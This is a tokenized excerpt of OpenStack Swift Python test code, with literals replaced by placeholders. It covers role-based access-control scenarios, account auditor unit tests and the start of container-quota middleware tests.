'<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , 
'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( 
'<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT:200> ) <EOL> ] <EOL> class SwiftClient ( object ) : <EOL> _tokens = { } <EOL> def __init__ ( self ) : <EOL> self . _set_users ( ) <EOL> self . auth_url = tf . swift_test_auth <EOL> self . insecure = tf . insecure <EOL> self . auth_version = tf . swift_test_auth_version <EOL> def _set_users ( self ) : <EOL> self . users = { } <EOL> for index in range ( <NUM_LIT:6> ) : <EOL> self . users [ tf . swift_test_user [ index ] ] = { <EOL> '<STR_LIT>' : tf . swift_test_tenant [ index ] , <EOL> '<STR_LIT:password>' : tf . swift_test_key [ index ] , <EOL> '<STR_LIT>' : tf . swift_test_domain [ index ] } <EOL> def _get_auth ( self , user_name ) : <EOL> info = self . users . get ( user_name ) <EOL> if info is None : <EOL> return None , None <EOL> os_options = { '<STR_LIT>' : info [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : info [ '<STR_LIT>' ] } <EOL> authargs = dict ( snet = False , tenant_name = info [ '<STR_LIT>' ] , <EOL> auth_version = self . auth_version , os_options = os_options , <EOL> insecure = self . insecure ) <EOL> storage_url , token = get_auth ( <EOL> self . auth_url , user_name , info [ '<STR_LIT:password>' ] , ** authargs ) <EOL> return storage_url , token <EOL> def auth ( self , user_name ) : <EOL> storage_url , token = SwiftClient . _tokens . 
get ( user_name , ( None , None ) ) <EOL> if not token : <EOL> SwiftClient . _tokens [ user_name ] = self . _get_auth ( user_name ) <EOL> storage_url , token = SwiftClient . _tokens . get ( user_name ) <EOL> return storage_url , token <EOL> def send_request ( self , method , url , token = None , headers = None , <EOL> service_token = None ) : <EOL> headers = { } if headers is None else headers . copy ( ) <EOL> headers . update ( { '<STR_LIT:Content-Type>' : '<STR_LIT:application/json>' , <EOL> '<STR_LIT>' : '<STR_LIT:application/json>' } ) <EOL> if token : <EOL> headers [ '<STR_LIT>' ] = token <EOL> if service_token : <EOL> headers [ '<STR_LIT>' ] = service_token <EOL> if self . insecure : <EOL> parsed , conn = http_connection ( url , insecure = self . insecure ) <EOL> else : <EOL> parsed , conn = http_connection ( url ) <EOL> conn . request ( method , parsed . path , headers = headers ) <EOL> resp = conn . getresponse ( ) <EOL> return resp <EOL> class BaseTestAC ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . reseller_admin = tf . swift_test_user [ <NUM_LIT:5> ] <EOL> self . client = SwiftClient ( ) <EOL> def _create_resource_url ( self , storage_url , account = None , <EOL> container = None , obj = None , reseller_prefix = None ) : <EOL> storage_url_list = storage_url . rstrip ( '<STR_LIT:/>' ) . split ( '<STR_LIT:/>' ) <EOL> base_url = '<STR_LIT:/>' . join ( storage_url_list [ : - <NUM_LIT:1> ] ) <EOL> if account is None : <EOL> account = storage_url_list [ - <NUM_LIT:1> ] <EOL> if reseller_prefix == '<STR_LIT>' : <EOL> i = ( account . index ( '<STR_LIT:_>' ) + <NUM_LIT:1> ) if '<STR_LIT:_>' in account else <NUM_LIT:0> <EOL> account = tf . swift_test_service_prefix + account [ i : ] <EOL> return '<STR_LIT:/>' . join ( [ part for part in ( base_url , account , container , obj ) <EOL> if part ] ) <EOL> def _put_container ( self , storage_url , token , test_case ) : <EOL> resource_url = self . 
_create_resource_url ( <EOL> storage_url , <EOL> test_case [ '<STR_LIT>' ] , <EOL> test_case [ '<STR_LIT>' ] , <EOL> reseller_prefix = test_case [ '<STR_LIT>' ] ) <EOL> self . created_resources . append ( resource_url ) <EOL> self . client . send_request ( '<STR_LIT>' , resource_url , token , <EOL> headers = test_case [ '<STR_LIT>' ] ) <EOL> def _put_object ( self , storage_url , token , test_case ) : <EOL> resource_url = self . _create_resource_url ( <EOL> storage_url , <EOL> test_case [ '<STR_LIT>' ] , <EOL> test_case [ '<STR_LIT>' ] , <EOL> test_case [ '<STR_LIT:object_name>' ] , <EOL> reseller_prefix = test_case [ '<STR_LIT>' ] ) <EOL> self . created_resources . append ( resource_url ) <EOL> self . client . send_request ( '<STR_LIT>' , resource_url , token ) <EOL> def _get_storage_url_and_token ( self , storage_url_user , token_user ) : <EOL> storage_url , _junk = self . client . auth ( storage_url_user ) <EOL> _junk , token = self . client . auth ( token_user ) <EOL> return storage_url , token <EOL> def _prepare ( self , test_case ) : <EOL> storage_url , reseller_token = self . _get_storage_url_and_token ( <EOL> test_case [ '<STR_LIT>' ] , self . reseller_admin ) <EOL> if test_case [ '<STR_LIT>' ] in ( '<STR_LIT:GET>' , '<STR_LIT:POST>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) : <EOL> temp_test_case = test_case . copy ( ) <EOL> if test_case [ '<STR_LIT>' ] is None : <EOL> temp_test_case [ '<STR_LIT>' ] = uuid . uuid4 ( ) . hex <EOL> self . _put_container ( storage_url , reseller_token , temp_test_case ) <EOL> if test_case [ '<STR_LIT:object_name>' ] : <EOL> self . _put_object ( storage_url , reseller_token , test_case ) <EOL> elif test_case [ '<STR_LIT>' ] in ( '<STR_LIT>' , ) : <EOL> if test_case [ '<STR_LIT:object_name>' ] : <EOL> self . _put_container ( storage_url , reseller_token , test_case ) <EOL> def _execute ( self , test_case ) : <EOL> storage_url , token = self . 
_get_storage_url_and_token ( <EOL> test_case [ '<STR_LIT>' ] , test_case [ '<STR_LIT>' ] ) <EOL> service_user = test_case [ '<STR_LIT>' ] <EOL> service_token = ( None if service_user is None <EOL> else self . client . auth ( service_user ) [ <NUM_LIT:1> ] ) <EOL> resource_url = self . _create_resource_url ( <EOL> storage_url , <EOL> test_case [ '<STR_LIT>' ] , <EOL> test_case [ '<STR_LIT>' ] , <EOL> test_case [ '<STR_LIT:object_name>' ] , <EOL> test_case [ '<STR_LIT>' ] ) <EOL> if test_case [ '<STR_LIT>' ] in ( '<STR_LIT>' ) : <EOL> self . created_resources . append ( resource_url ) <EOL> resp = self . client . send_request ( test_case [ '<STR_LIT>' ] , <EOL> resource_url , <EOL> token , <EOL> headers = test_case [ '<STR_LIT>' ] , <EOL> service_token = service_token ) <EOL> return resp . status <EOL> def _cleanup ( self ) : <EOL> _junk , reseller_token = self . client . auth ( self . reseller_admin ) <EOL> for resource_url in reversed ( self . created_resources ) : <EOL> resp = self . client . send_request ( '<STR_LIT>' , resource_url , <EOL> reseller_token ) <EOL> self . assertIn ( resp . status , ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> def _convert_data ( self , data ) : <EOL> test_case = dict ( zip ( TEST_CASE_FORMAT , data ) ) <EOL> if test_case [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> test_case [ '<STR_LIT>' ] = uuid . uuid4 ( ) . hex <EOL> if test_case [ '<STR_LIT:object_name>' ] == '<STR_LIT>' : <EOL> test_case [ '<STR_LIT:object_name>' ] = uuid . uuid4 ( ) . hex <EOL> return test_case <EOL> def _run_scenario ( self , scenario ) : <EOL> for data in scenario : <EOL> test_case = self . _convert_data ( data ) <EOL> self . created_resources = [ ] <EOL> try : <EOL> self . _prepare ( test_case ) <EOL> result = self . _execute ( test_case ) <EOL> self . assertEqual ( test_case [ '<STR_LIT>' ] , <EOL> result , <EOL> '<STR_LIT>' % <EOL> ( test_case [ '<STR_LIT>' ] , result , test_case ) ) <EOL> finally : <EOL> self . 
_cleanup ( ) <EOL> class TestRBAC ( BaseTestAC ) : <EOL> def test_rbac ( self ) : <EOL> if any ( ( tf . skip , tf . skip2 , tf . skip3 , tf . skip_if_not_v3 , <EOL> tf . skip_if_no_reseller_admin ) ) : <EOL> raise SkipTest <EOL> scenario_rbac = RBAC_PUT + RBAC_DELETE + RBAC_GET + RBAC_HEAD + RBAC_POST + RBAC_OPTIONS <EOL> shuffle ( scenario_rbac ) <EOL> self . _run_scenario ( scenario_rbac ) <EOL> def test_rbac_with_service_prefix ( self ) : <EOL> if any ( ( tf . skip , tf . skip2 , tf . skip3 , tf . skip_if_not_v3 , <EOL> tf . skip_service_tokens , tf . skip_if_no_reseller_admin ) ) : <EOL> raise SkipTest <EOL> scenario_rbac = RBAC_PUT_WITH_SERVICE_PREFIX + RBAC_DELETE_WITH_SERVICE_PREFIX + RBAC_GET_WITH_SERVICE_PREFIX + RBAC_HEAD_WITH_SERVICE_PREFIX + RBAC_POST_WITH_SERVICE_PREFIX + RBAC_OPTIONS_WITH_SERVICE_PREFIX <EOL> shuffle ( scenario_rbac ) <EOL> self . _run_scenario ( scenario_rbac ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> from collections import defaultdict <EOL> import itertools <EOL> import unittest <EOL> import mock <EOL> import time <EOL> import os <EOL> import random <EOL> from tempfile import mkdtemp <EOL> from shutil import rmtree <EOL> from eventlet import Timeout <EOL> from swift . account import auditor <EOL> from swift . common . storage_policy import POLICIES <EOL> from swift . common . utils import Timestamp <EOL> from test . unit import debug_logger , patch_policies , with_tempdir <EOL> from test . unit . account . test_backend import ( <EOL> AccountBrokerPreTrackContainerCountSetup ) <EOL> class FakeAccountBroker ( object ) : <EOL> def __init__ ( self , path ) : <EOL> self . path = path <EOL> self . db_file = path <EOL> self . file = os . path . basename ( path ) <EOL> def is_deleted ( self ) : <EOL> return False <EOL> def get_info ( self ) : <EOL> if self . file . startswith ( '<STR_LIT>' ) : <EOL> raise ValueError ( ) <EOL> if self . file . startswith ( '<STR_LIT:true>' ) : <EOL> return defaultdict ( int ) <EOL> def get_policy_stats ( self , ** kwargs ) : <EOL> if self . file . startswith ( '<STR_LIT>' ) : <EOL> raise ValueError ( ) <EOL> if self . file . startswith ( '<STR_LIT:true>' ) : <EOL> return defaultdict ( int ) <EOL> class TestAuditor ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . testdir = os . path . join ( mkdtemp ( ) , '<STR_LIT>' ) <EOL> self . logger = debug_logger ( ) <EOL> rmtree ( self . testdir , ignore_errors = <NUM_LIT:1> ) <EOL> os . mkdir ( self . testdir ) <EOL> fnames = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> for fn in fnames : <EOL> with open ( os . path . join ( self . testdir , fn ) , '<STR_LIT>' ) as f : <EOL> f . write ( '<STR_LIT:U+0020>' ) <EOL> def tearDown ( self ) : <EOL> rmtree ( os . path . dirname ( self . testdir ) , ignore_errors = <NUM_LIT:1> ) <EOL> @ mock . 
patch ( '<STR_LIT>' , FakeAccountBroker ) <EOL> def test_run_forever ( self ) : <EOL> sleep_times = random . randint ( <NUM_LIT:5> , <NUM_LIT:10> ) <EOL> call_times = sleep_times - <NUM_LIT:1> <EOL> class FakeTime ( object ) : <EOL> def __init__ ( self ) : <EOL> self . times = <NUM_LIT:0> <EOL> def sleep ( self , sec ) : <EOL> self . times += <NUM_LIT:1> <EOL> if self . times >= sleep_times : <EOL> raise ValueError ( ) <EOL> def time ( self ) : <EOL> return time . time ( ) <EOL> conf = { } <EOL> test_auditor = auditor . AccountAuditor ( conf , logger = self . logger ) <EOL> with mock . patch ( '<STR_LIT>' , FakeTime ( ) ) : <EOL> def fake_audit_location_generator ( * args , ** kwargs ) : <EOL> files = os . listdir ( self . testdir ) <EOL> return [ ( os . path . join ( self . testdir , f ) , '<STR_LIT>' , '<STR_LIT>' ) for f in files ] <EOL> with mock . patch ( '<STR_LIT>' , <EOL> fake_audit_location_generator ) : <EOL> self . assertRaises ( ValueError , test_auditor . run_forever ) <EOL> self . assertEqual ( test_auditor . account_failures , <NUM_LIT:2> * call_times ) <EOL> self . assertEqual ( test_auditor . account_passes , <NUM_LIT:3> * call_times ) <EOL> def fake_one_audit_pass ( reported ) : <EOL> raise Timeout ( ) <EOL> with mock . patch ( '<STR_LIT>' , <EOL> fake_one_audit_pass ) : <EOL> with mock . patch ( '<STR_LIT>' , FakeTime ( ) ) : <EOL> self . assertRaises ( ValueError , test_auditor . run_forever ) <EOL> self . assertEqual ( test_auditor . account_failures , <NUM_LIT:2> * call_times ) <EOL> self . assertEqual ( test_auditor . account_passes , <NUM_LIT:3> * call_times ) <EOL> @ mock . patch ( '<STR_LIT>' , FakeAccountBroker ) <EOL> def test_run_once ( self ) : <EOL> conf = { } <EOL> test_auditor = auditor . AccountAuditor ( conf , logger = self . logger ) <EOL> def fake_audit_location_generator ( * args , ** kwargs ) : <EOL> files = os . listdir ( self . testdir ) <EOL> return [ ( os . path . join ( self . 
testdir , f ) , '<STR_LIT>' , '<STR_LIT>' ) for f in files ] <EOL> with mock . patch ( '<STR_LIT>' , <EOL> fake_audit_location_generator ) : <EOL> test_auditor . run_once ( ) <EOL> self . assertEqual ( test_auditor . account_failures , <NUM_LIT:2> ) <EOL> self . assertEqual ( test_auditor . account_passes , <NUM_LIT:3> ) <EOL> @ mock . patch ( '<STR_LIT>' , FakeAccountBroker ) <EOL> def test_one_audit_pass ( self ) : <EOL> conf = { } <EOL> test_auditor = auditor . AccountAuditor ( conf , logger = self . logger ) <EOL> def fake_audit_location_generator ( * args , ** kwargs ) : <EOL> files = os . listdir ( self . testdir ) <EOL> return [ ( os . path . join ( self . testdir , f ) , '<STR_LIT>' , '<STR_LIT>' ) for f in files ] <EOL> test_auditor . logging_interval = <NUM_LIT:0> <EOL> with mock . patch ( '<STR_LIT>' , <EOL> fake_audit_location_generator ) : <EOL> test_auditor . _one_audit_pass ( test_auditor . logging_interval ) <EOL> self . assertEqual ( test_auditor . account_failures , <NUM_LIT:0> ) <EOL> self . assertEqual ( test_auditor . account_passes , <NUM_LIT:0> ) <EOL> @ mock . patch ( '<STR_LIT>' , FakeAccountBroker ) <EOL> def test_account_auditor ( self ) : <EOL> conf = { } <EOL> test_auditor = auditor . AccountAuditor ( conf , logger = self . logger ) <EOL> files = os . listdir ( self . testdir ) <EOL> for f in files : <EOL> path = os . path . join ( self . testdir , f ) <EOL> test_auditor . account_audit ( path ) <EOL> self . assertEqual ( test_auditor . account_failures , <NUM_LIT:2> ) <EOL> self . assertEqual ( test_auditor . account_passes , <NUM_LIT:3> ) <EOL> @ patch_policies <EOL> class TestAuditorRealBrokerMigration ( <EOL> AccountBrokerPreTrackContainerCountSetup , unittest . TestCase ) : <EOL> def test_db_migration ( self ) : <EOL> policies = itertools . 
cycle ( POLICIES ) <EOL> num_containers = len ( POLICIES ) * <NUM_LIT:3> <EOL> per_policy_container_counts = defaultdict ( int ) <EOL> for i in range ( num_containers ) : <EOL> name = '<STR_LIT>' % i <EOL> policy = next ( policies ) <EOL> self . broker . put_container ( name , next ( self . ts ) , <EOL> <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , int ( policy ) ) <EOL> per_policy_container_counts [ int ( policy ) ] += <NUM_LIT:1> <EOL> self . broker . _commit_puts ( ) <EOL> self . assertEqual ( num_containers , <EOL> self . broker . get_info ( ) [ '<STR_LIT>' ] ) <EOL> self . assertUnmigrated ( self . broker ) <EOL> conf = { '<STR_LIT>' : self . tempdir , '<STR_LIT>' : False , <EOL> '<STR_LIT>' : self . tempdir } <EOL> test_auditor = auditor . AccountAuditor ( conf , logger = debug_logger ( ) ) <EOL> test_auditor . run_once ( ) <EOL> self . restore_account_broker ( ) <EOL> broker = auditor . AccountBroker ( self . db_path ) <EOL> with broker . get ( ) as conn : <EOL> rows = conn . execute ( '''<STR_LIT>''' ) . fetchall ( ) <EOL> for policy_index , container_count in rows : <EOL> self . assertEqual ( container_count , <EOL> per_policy_container_counts [ policy_index ] ) <EOL> class TestAuditorRealBroker ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . logger = debug_logger ( ) <EOL> @ with_tempdir <EOL> def test_db_validate_fails ( self , tempdir ) : <EOL> ts = ( Timestamp ( t ) . internal for t in itertools . count ( int ( time . time ( ) ) ) ) <EOL> db_path = os . path . join ( tempdir , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT:0>' , '<STR_LIT:0>' , '<STR_LIT:0>' , '<STR_LIT>' ) <EOL> broker = auditor . AccountBroker ( db_path , account = '<STR_LIT:a>' ) <EOL> broker . initialize ( next ( ts ) ) <EOL> policies = itertools . 
cycle ( POLICIES ) <EOL> num_containers = len ( POLICIES ) * <NUM_LIT:3> <EOL> per_policy_container_counts = defaultdict ( int ) <EOL> for i in range ( num_containers ) : <EOL> name = '<STR_LIT>' % i <EOL> policy = next ( policies ) <EOL> broker . put_container ( name , next ( ts ) , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , int ( policy ) ) <EOL> per_policy_container_counts [ int ( policy ) ] += <NUM_LIT:1> <EOL> broker . _commit_puts ( ) <EOL> self . assertEqual ( broker . get_info ( ) [ '<STR_LIT>' ] , num_containers ) <EOL> messed_up_policy = random . choice ( list ( POLICIES ) ) <EOL> with broker . get ( ) as conn : <EOL> conn . executescript ( '''<STR_LIT>''' % int ( messed_up_policy ) ) <EOL> policy_stats = broker . get_policy_stats ( ) <EOL> self . assertEqual ( <EOL> policy_stats [ int ( messed_up_policy ) ] [ '<STR_LIT>' ] , <EOL> per_policy_container_counts [ int ( messed_up_policy ) ] - <NUM_LIT:1> ) <EOL> conf = { '<STR_LIT>' : tempdir , '<STR_LIT>' : False , <EOL> '<STR_LIT>' : tempdir } <EOL> test_auditor = auditor . AccountAuditor ( conf , logger = self . logger ) <EOL> test_auditor . run_once ( ) <EOL> self . assertEqual ( test_auditor . account_failures , <NUM_LIT:1> ) <EOL> error_lines = test_auditor . logger . get_lines_for_level ( '<STR_LIT:error>' ) <EOL> self . assertEqual ( len ( error_lines ) , <NUM_LIT:1> ) <EOL> error_message = error_lines [ <NUM_LIT:0> ] <EOL> self . assertTrue ( broker . db_file in error_message ) <EOL> self . assertTrue ( '<STR_LIT>' in error_message ) <EOL> self . assertTrue ( '<STR_LIT>' in error_message ) <EOL> self . assertEqual ( test_auditor . logger . get_increment_counts ( ) , <EOL> { '<STR_LIT>' : <NUM_LIT:1> } ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import unittest <EOL> from swift . common . swob import Request , HTTPUnauthorized <EOL> from swift . common . middleware import container_quotas <EOL> class FakeCache ( object ) : <EOL> def __init__ ( self , val ) : <EOL> if '<STR_LIT:status>' not in val : <EOL> val [ '<STR_LIT:status>' ] = <NUM_LIT:200> <EOL> self . val = val <EOL> def get ( self , * args ) : <EOL> return self . val <EOL> class FakeApp ( object ) : <EOL> def __init__ ( self ) : <EOL> pass <EOL> def __call__ ( self , env , start_response ) : <EOL> start_response ( '<STR_LIT>' , [ ] ) <EOL> return [ ] <EOL> class FakeMissingApp ( object ) : <EOL> def __init__ ( self ) : <EOL> pass <EOL> def __call__ ( self , env , start_response ) : <EOL> start_response ( '<STR_LIT>' , [ ] ) <EOL> return [ ] <EOL> def start_response ( * args ) : <EOL> pass <EOL> class TestContainerQuotas ( unittest . TestCase ) : <EOL> def test_split_path_empty_container_path_segment ( self ) : <EOL> app = container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) <EOL> req = Request . blank ( '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT:value>' } } ) <EOL> res = req . get_response ( app ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT:200> ) <EOL> def test_not_handled ( self ) : <EOL> app = container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) <EOL> req = Request . blank ( '<STR_LIT>' , environ = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> res = req . get_response ( app ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT:200> ) <EOL> app = container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) <EOL> req = Request . blank ( '<STR_LIT>' , environ = { '<STR_LIT>' : '<STR_LIT:GET>' } ) <EOL> res = req . get_response ( app ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT:200> ) <EOL> def test_no_quotas ( self ) : <EOL> app = container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) <EOL> req = Request . 
blank ( <EOL> '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : FakeCache ( { } ) , <EOL> '<STR_LIT>' : '<STR_LIT:100>' } ) <EOL> res = req . get_response ( app ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT:200> ) <EOL> def test_exceed_bytes_quota ( self ) : <EOL> app = container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) <EOL> cache = FakeCache ( { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:2>' } } ) <EOL> req = Request . blank ( <EOL> '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : cache , <EOL> '<STR_LIT>' : '<STR_LIT:100>' } ) <EOL> res = req . get_response ( app ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT> ) <EOL> self . assertEqual ( res . body , '<STR_LIT>' ) <EOL> def test_exceed_bytes_quota_copy_from ( self ) : <EOL> app = container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) <EOL> cache = FakeCache ( { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:2>' } } ) <EOL> req = Request . blank ( '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT:10> } , <EOL> '<STR_LIT>' : cache } , <EOL> headers = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> res = req . get_response ( app ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT> ) <EOL> self . assertEqual ( res . body , '<STR_LIT>' ) <EOL> def test_exceed_bytes_quota_copy_verb ( self ) : <EOL> app = container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) <EOL> cache = FakeCache ( { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:2>' } } ) <EOL> req = Request . blank ( '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT:10> } , <EOL> '<STR_LIT>' : cache } , <EOL> headers = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> res = req . get_response ( app ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT> ) <EOL> self . assertEqual ( res . 
body , '<STR_LIT>' ) <EOL> def test_not_exceed_bytes_quota ( self ) : <EOL> app = container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) <EOL> cache = FakeCache ( { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:100>' } } ) <EOL> req = Request . blank ( <EOL> '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : cache , <EOL> '<STR_LIT>' : '<STR_LIT:100>' } ) <EOL> res = req . get_response ( app ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT:200> ) <EOL> def test_not_exceed_bytes_quota_copy_from ( self ) : <EOL> app = container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) <EOL> cache = FakeCache ( { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:100>' } } ) <EOL> req = Request . blank ( '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT:10> } , <EOL> '<STR_LIT>' : cache } , <EOL> headers = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> res = req . get_response ( app ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT:200> ) <EOL> def test_not_exceed_bytes_quota_copy_verb ( self ) : <EOL> app = container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) <EOL> cache = FakeCache ( { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:100>' } } ) <EOL> req = Request . blank ( '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT:10> } , <EOL> '<STR_LIT>' : cache } , <EOL> headers = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> res = req . get_response ( app ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT:200> ) <EOL> def test_bytes_quota_copy_from_no_src ( self ) : <EOL> app = container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , 